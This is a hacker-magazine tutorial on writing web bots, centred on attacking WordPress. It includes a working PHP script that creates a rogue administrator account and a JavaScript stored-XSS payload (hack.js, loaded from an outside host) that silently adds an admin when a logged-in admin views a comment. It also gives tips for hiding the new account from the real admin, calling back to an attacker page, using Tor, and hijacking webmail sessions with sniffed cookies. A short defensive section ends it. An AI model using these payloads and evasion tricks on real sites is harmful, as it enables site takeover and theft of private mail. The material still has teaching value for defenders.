Coding Bots and Hacking WordPress

by Micha Lee

I'm going to explain how to write code that automatically loads web pages, submits forms, and does sinister stuff, while looking like it's human.

These techniques can be used to exploit Cross-Site Scripting (XSS) vulnerabilities, download copies of web-based databases, cheat in web games, and quite a bit more.  The languages I'm going to be using are PHP and JavaScript.  I'm primarily going to use WordPress as an example website that I'll be attacking, but that's only because I'm a fan of WordPress.

This stuff will work against any website, as long as you can find an XSS hole.

The HTTP Protocol

Before I dive too deeply into code, it's important to know the basics of how the web works.

It all runs over this protocol called HTTP, which is a very simple way that web browsers can communicate with web servers.  The browser makes requests, and the server returns some sort of output based on that.  Each time a browser makes an HTTP request, it includes a lot of header information, and each time the web server responds, it includes header information as well.

Sometimes websites use HTTPS, which is just HTTP wrapped in a layer of SSL encryption, so it uses the exact same protocol.

So, here's an example.  I just opened up my web browser, typed 2600.com in the address bar, and hit Enter.

Here's the GET request I sent to the server:

GET / HTTP/1.1
Host: 2600.com
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

My web browser was smart enough to figure out the IP address of 2600.com and open up a connection to it on port 80.

The first line is telling the web server I want everything in the root directory (/) of the web server.

The next line is telling it that the host I'm looking for is 2600.com (sometimes the same web server hosts several different websites, so the Host header lets the web server know which one you're interested in).

The third line is my User-Agent string, and this tells the web server some information about myself.

From this one you can tell that I'm using Firefox 3.6.3 and I'm using Mac OS X 10.6.

The rest of the lines aren't all that important, but you can feel free to look them up.

A note about the User-Agent: It normally tells the web server what operating system and web browser you're using, and web servers use this information for a bunch of different things.

Google Analytics uses this to give website owners stats about what computers their visitors use.  A lot of websites check to see if the user agent says you're using an iPhone and an Android phone and then serves up a mobile version of the website instead of the normal one.

And then there are bots.  When Google spiders a website to add pages to its search engine database, it uses the HTTP protocol just like you and me, but its User-Agent string looks something like this instead:

User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)

It's ridiculously easy to spoof your user agent.  Try downloading the User-Agent Switcher Firefox extension just to see how easy it is.

After sending that GET request for / to 2600.com, here's the response my browser got:

HTTP/1.1 301 Moved Permanently
Date: Sat, 22 May 2010 23:02:49 GMT
Location: http://www.2600.com/
Keep-Alive: timeout=5, max=50
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

It returned with a 301 error code, which means it has Moved Permanently.

Other common codes are 200, which means everything is O.K., 404, which means File Not Found, and 500, which means Internal Server Error.

The rest of the lines are HTTP headers, but the important one is the Location header.  If my browser gets a Location header in a response, that means it needs to redirect to there instead.

In this case, loading http://2600.com wants me to redirect to http://www.2600.com.

My browser faithfully complies:

GET / HTTP/1.1
Host: www.2600.com
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
[more headers...]

I'm sending another GET request to the server, but this time with the host as www.2600.com, and it responds:

HTTP/1.1 200 OK
[more headers...]

<html>
<head>
<title>2600: The Hacker Quarterly</title>
<script type="text/javascript" src="nav.js"></script>
<link rel="stylesheet" type="text/css" href="nav.css" />
<link rel="alternate" type="application/rss+xml" title="2600.com RSS Feed" href="http://www.2600.com/rss.xml">
[more HTML code ...]

To recap, when we try to go to 2600.com, it redirects to www.2600.com (technically, these are separate domain names and could be hosting separate sites).

Once it returned a 200 OK, it spit out the HTML code of the website hosted at / on www.2600.com.

My browser sends requests, the server sends responses.  That's called HTTP.

A Quick Note About Cookies

Cookies are name-value pairs that websites use to save information in your web browser.

One of their main uses is to keep persistent data about you in an active "session" as you make several requests to the server.  When you login to a website, the only way it knows that you're still logged in the next time you reload the page is because you send your cookie back to the website as a line in the headers.

You pass cookies to the web server with the Cookie header, and the web server sets cookies in your browser with the Set-Cookie header.

This is important to understand because a lot of bots you write might require you to correctly handle cookies to do what you want, especially if you want to do something like exploit an XSS bug, make a social networking worm, or write a script that downloads and stores everything from someone's web mail account.

Some Tools to See WTF is Going On

You rarely actually see what HTTP headers you're sending to web servers, and what headers are included in the responses.

For writing this article, I used the Firefox extensions Live HTTP Headers and Tamper Data.  Other Firefox extensions that you might find useful are Firebug and Web Developer (useful for cookie management).

Also, Wireshark and tcpdump are great tools for any sort of network monitoring.  And if you're trying this on more complicated sites, especially ones with lots of Ajax, I highly suggest using an intercepting proxy like Paros or WebScarab.

Start with Something Simple

With PHP, the best way to write a web bot is to use the cURL functions.

The cURL functions to know are: curl_init(), curl_setopt(), curl_exec(), and curl_close()

Here's an example of a simple PHP script that checks 2600's Twitter feed and prints out the latest tweet.  And, just for laughs, we'll pretend to be using IE6 on Windows:

get-2600-tweet.php:

<?php
// get twitter.com/2600, and store it in $output
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'http://twitter.com/2600');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)');
$output = curl_exec($ch);
curl_close($ch);
// search through $output for the latest tweet
$start_string = '<span class="entry-content">';
$start = strpos($output, $start_string, 0) + strlen($start_string);
$end = strpos($output, '</span>', $start);
$tweet = substr($output, $start, $end-$start);
// display this tweet to the screen
echo(trim($tweet)."\n");
?>

Go ahead and make a new PHP file and put this code in it.

Run it either from a web browser (you need to copy it to the web root of a computer with a web server installed) or the command line (type php get-2600-tweet.php as long as you have PHP and libcurl installed).  Assuming Twitter hasn't changed their layout since I wrote this, it should print out 2600's latest tweet.

I'll go through it line by line.

In the first block of code, curl_init() gets called and stores a handle to the curl object in the variable $ch.

The next three lines of code add options to this curl object: the URL of the website it will be loading, that we want curl_exec() to return all the HTML code, and we set a fake user agent string pretending we're using IE6.

The next line of code runs curl_exec(), which actually sends the HTTP request to twitter.com/2600, and then stores everything returned into $output.

And then the next line, just to be good, closes the curl object.  Now we have all the HTML from that request stored in the variable $output, as one large string.

The next block of code searches through the returned HTML code for the first tweet.

It uses very common string handling functions: strpos(), strlen(), and substr().

Every programming language has some of this stuff built in, and if you're not familiar with these functions, I encourage you to look them up.

Basically, this searches $output for the first occurrence of the string <span class="entry-content">, and then the next </span> after that, and stores what's between those in the variable $tweet.

I figured this out by going to twitter.com/2600 myself and viewing the source of the page.

And then the final echo() function just prints out $tweet.  The trim() functions strips the white space, and then I add a new line at the end to make the display a little prettier.

Pretty cool, huh?

Automatically Creating WordPress Users

Now let's do something a little more difficult.

Let's login to a WordPress website (for this example, hosted at localhost/wordpress) and add a new administrator user.

I'll do this manually first and record the HTTP conversation with the Live HTTP Headers extension.

POST /wordpress/wp-login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
[some extra headers...]
Referer: http://localhost/wordpress/wp-login.php
Cookie: wordpress_test_cookie=WP+Cookie+check
Content-Type: application/x-www-form-urlencoded
Content-Length: 116
log=admin&pwd=supersecret&wp-submit=Log+In&redirect_to=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2F&testcookie=1

This time I sent a POST request (the ones above for 2600.com and twitter.com were GET requests), and this time I also sent a Referer header, and a Cookie header.

POST and GET are similar, but GET requests send all the data through the URL, while POST requests send the data beneath the headers in the POST request.

As you can see, beneath the POST request headers is a URL-encoded string of name-value pairs.

log is set to admin (which is the username), pwd is set to supersecret (which is the password), and then there are other hidden fields that get sent to: wp-submit is Log In, redirect_to is http://localhost/wordpress/wp-admin/, and testcookie is 1.

And here was the response:

HTTP/1.1 302 Found
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/wordpress/
Set-Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1274755424%7C70045a572d5f43ad9d0fe822683fe7f6; path=/wordpress/wp-content/plugins; httponly
Set-Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1274755424%7C70045a572d5f43ad9d0fe822683fe7f6; path=/wordpress/wp-admin; httponly
Set-Cookie: wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1274755424%7C32f9298d9371bbc7f684dafb2ce161bb; path=/wordpress/; httponly
Location: http://localhost/wordpress/wp-admin/
[some more headers here too...]

After logging in, the website sets four cookies, and each cookie has a path.

As you can see, two of the cookies have the same name and value, but different paths.  Don't worry about this, the web browser will only send one copy of this cookie.

Now I'm going ahead and adding a new user called hacker with the email address hacker@fakeemailaddress.com and the password letmein.

Here's the POST request:

POST /wordpress/wp-admin/user-new.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
[more headers...]
Referer: http://localhost/wordpress/wp-admin/user-new.php
Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1
274758230%7C2fd245efd985716182bf76c2a5d44693; wordpress_test_cookie=WP+Cookie+check; wp-settings-time-1=1274585390; wp-settings-1=m6%3Do; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1274758230%7C037c433811bd050823ae570f3b3d38d5
Content-Type: application/x-www-form-urlencoded
Content-Length: 236
_wpnonce=07cd245b42&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fuser-new.php&action=adduser&user_login=hacker&first_name=&last_name=&email=hacker%40fakeemailaddress.com&url=&pass1=letmein&pass2=letmein&role=administrator&adduser=Add+User

In order to add a new user, I need to send a POST request to: /wordpress/wp-admin/user-new.php

I need to pass along a cookie string with the cookies that were set earlier.

The data for the POST request needs to include these fields: _wpnonce, _wp_http_referer, action, user_login, first_name, last_name, email, url, pass1, pass2, role, and adduser (although several of the values are blank).

The first field, _wpnonce, is going to cause a problem.  That's there specifically to prevent people like me from doing things like this.  The value is 07cd245b42, but how are we supposed to know that?

If I look at the source code of the add user page, it contains this:

<input type="hidden" id="_wpnonce" name="_wpnonce" value="07cd245b42" />

To get that value, we'll just need to send a GET request to /wordpress/wp-admin/user-new.php first, search through its HTML for the hidden field called _wpnonce, and then submit the form with that value.

Here's a PHP script that does all of that:

add-wordpress.php:

<?php
// set the url of the wordpress site to do this on
$wp_url = 'http://localhost/wordpress';
// this will only work if we already have a username and password
$username = 'admin';
$password = 'supersecret';
// set the username, password, and email of the new user we will create
$new_username = 'hacker';
$new_password = 'letmein';
$new_email = 'hacker@fakeemailaddress.com';
// make up a user agent to use, lets say IE6 again
$user_agent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)';
// start by logging into wordpress (using POST, not GET)
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url.'/wp-login.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'log='.urlencode($username).'&pwd='.urlencode($password).'&wp-submit=Log+In&redirect_to=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2F&testcookie=1');
curl_setopt($ch, CURLOPT_REFERER, $wp_url.'/wp-login.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
$output = curl_exec($ch);
curl_close($ch);
// search $output for the four cookies, add them to an array
$index = 0;
$cookieStrings = array();
for($i=0; $i<4; $i++) {
    $start_string = 'Set-Cookie: ';
    $start = strpos($output, $start_string, $index) + strlen($start_string);
    $end_string = ';';
    $end = strpos($output, $end_string, $start);
    $cookieStrings[] = substr($output, $start, $end-$start);
    $index = $end + strlen($end);
}
// turn cookies into a single cookie string (skipping 4th cookie, since it's the same as 2nd)
$cookie = $cookieStrings[0].'; '.$cookieStrings[1].'; '.$cookieStrings[3];
// load the add user page
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url.'/wp-admin/user-new.php');
curl_setopt($ch, CURLOPT_REFERER, $wp_url.'/wp-admin/');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
$output = curl_exec($ch);
curl_close($ch);
// search for _wpnonce hidden field value
$start_string = '<input type="hidden" id="_wpnonce" name="_wpnonce" value="';
$start = strpos($output, $start_string, 0) + strlen($start_string);
$end_string = '" />';
$end = strpos($output, $end_string, $start);
$_wpnonce = substr($output, $start, $end-$start);
// add our new user
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url.'/wp-admin/user-new.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, '_wpnonce='.urlencode($_wpnonce).'&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fuser-new.php&action=adduser&user_login='.urlencode($new_username).'&first_name=&last_name=&email='.urlencode($new_email).'&url=&pass1='.urlencode($new_password).'&pass2='.urlencode($new_password).'&role=administrator&adduser=Add+User');
curl_setopt($ch, CURLOPT_REFERER, $wp_url.'/wp-admin/user-new.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
$output = curl_exec($ch);
curl_close($ch);
?>

This little piece of code totally works (with WordPress 2.9.2 anyway).

Change the $wp_url, $username, and $password to a WordPress site you control, and run it.

Go look at your WordPress users.  You'll have a new administrator user called hacker.

Thoughts on PHP Bots

Using PHP and cURL, you can write a bot that can do (almost) anything a human can do, as long as you're able to do it by hand first and see what the HTTP headers look like.  And since it's a bot, it's simple to run it, say, 150,000 times in a row, or to run it once every five minutes until you want to stop it.

What if you want to be anonymous?

It's easy to use cURL through a proxy server, and in fact you can even use cURL through the Tor network (though it will be much slower).  Just look up the docs for curl_setopt() to find out how.

I mentioned writing bots that can download and store all the email in a webmail account.

Well, webmail uses HTTP, which means it uses cookies to keep track of active sessions.  It's totally feasible to write a PHP script that, given a cookie string for someone's Yahoo! mail account (which you can get by sniffing traffic on a public Wi-Fi network), can download and store all of their email as long they don't log out before your script is done running.

These are all things you can do with PHP, or with any other server-side language like Ruby, Python, Perl, or C.  But JavaScript on the other hand runs in web browsers, and you can get other people (like admins or other users of websites you're trying to hack) to run your code in their browsers if you exploit an XSS bug.

What is XSS?

An XSS bug is where you can submit information that includes JavaScript code to a website that gets displayed back to users of that website.

So, for example, maybe your first name is Bob, and your last name <script>alert(0)</script>.  If, after you submit this form, it says your first name is Bob and it pops up an alert box that says 0, that means you've found an XSS bug.  If someone else goes to your profile page, it will pop up an alert box for them that says 0 too.

Popping up an alert box is harmless enough, but with the power of Ajax, you can do a lot more sinister stuff.

Admins often have the ability to add new users to websites.  If an admin stumbles upon your profile where the Last Name field actually contains JavaScript, that code could silently add yourself as an admin user on the site, and even alert you that this has happened so you can login, escalate privileges to command execution on their server, and cover your tracks.

People use Ajax as a buzzword to mean any sort of fancy JavaScript.

Really, all Ajax is is the ability for JavaScript to make its own HTTP requests and retrieve the responses, similar to the cURL library in PHP.

The WordPress XSS Payload

The PHP script that added a new user is a good start, but it's not very useful for hacking websites.

You need to already have access!

With XSS, you trick someone else who does have access to run it for you.  Pretend with me that there's an XSS bug in the comment form in WordPress.  You can post a comment and include JavaScript code that will then get executed whenever anyone loads the page.

You post a comment that says:

Good point! And all the other commenters are a bunch of trolls! <script src="http://example.com/hack.js"></script>

Whenever anyone loads this page, it executes http://example.com/hack.js on your site.

Here's what's in hack.js:

// setup
var wp_url = 'http://localhost/wordpress';
var new_username = 'hacker';
var new_password = 'letmein';
var new_email = 'hacker@fakeemailaddress.com';
// create an ajax object and return it
function ajaxObject() {
    var http;
    if(window.XMLHttpRequest) { http=new XMLHttpRequest(); }
    else{ http=new ActiveXObject("Microsoft.XMLHTTP"); }
    return http;
}
// load the user page
var http1 = ajaxObject();
http1.open("GET",wp_url+"/wp-admin/user-new.php",true);
http1.onreadystatechange = function() {
    if(http1.readyState != 4)
        return;
    
    // search for _wpnonce hidden field value
    var start_string = '<input type="hidden" id="_wpnonce" name="_wpnonce" value="';
    var start = http1.responseText.indexOf(start_string, 0) + start_string.length;
    var end_string = '" />';
    var end = http1.responseText.indexOf(end_string, start);
    var _wpnonce = http1.responseText.substring(start,end);
    
    // add out new user
    var http2 = ajaxObject();
    http2.open("POST",wp_url+"/wp-admin/user-new.php",true);
    http2.setRequestHeader("Content-type","application/x-www-form-urlencoded");
    http2.send('_wpnonce='+escape(_wpnonce)+'&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fuser-new.php&action=adduser&user_login='+escape(new_username)+'&first_name=&last_name=&email='+escape(new_email)+'&url=&pass1='+escape(new_password)+'&pass2='+escape(new_password)+'&role=administrator&adduser=Add+User');
}
http1.send();

If an admin loads this page, a new administrator user called hacker will silently get created.

If you want to test this out on a WordPress site you control, go ahead and upload this script as hack.js somewhere, and include it in a post (by editing the post in HTML mode).

Make sure you delete the hacker user first if it's already there.  Then, while you're logged in, load the post page, and go check to see what WordPress users your site has.  There will be a new one.

This particular script could be improved in a couple of ways.

For example, you can check to see if the user is logged into WordPress first before trying to add a new user (there will be a lot more traffic in the logs if each and every visitor sends extra requests to wp-admin/user-add.php).

Also, by default WordPress sends an email to the administrator of the site when a new user account gets created, so really this won't be silent at all.  To get around this, you can have the script first load the WordPress settings page to see what the admin email address is set to, then post the form to change the email address to your own email address, then add a new user, then submit the settings form again to change the email address back.

In this way, the real admin would never get an email about it, and you would instead.

It might take a week for the admin to get around to running your code, it might just take a day, or they might never run it.

If you want to be alerted when it happens, you can use Ajax to do that too.

Make a page on a website you control (say, http://example.com/alert.php) that sends you an email when it gets loaded.  Then make the Ajax GET that script when it gets executed, and you'll get an email when your new account is created.

If you're creative, the possibilities are endless.

There are two ways to protect your websites against automated web bots and crazy XSS attacks.

First, the only way to defeat bots is to include some sort of CAPTCHA (those annoying images with skewed letters you need to retype).

Make sure it actually works - I've seen forms with CAPTCHAs that still work fine if you ignore the CAPTCHA field.  Your CAPTCHA doesn't have to be skewed letters, but it does have to be annoying.

All it is is a simple Turing test, something that's easy for humans to answer but hard/impossible for computers, which means you'll have to test your users before they can continue if it's important to you to thwart bots.

And finally, fix all your XSS holes!

XSS gets dismissed as a lowly not-veryharmful vulnerability because "So what if someone pops up an alert box?"

Hopefully, this article will show you that it's a bit more dangerous than that.

Code: get-2600-tweet.php

Code: add-wordpress.php

Code: hack.js

Return to $2600 Index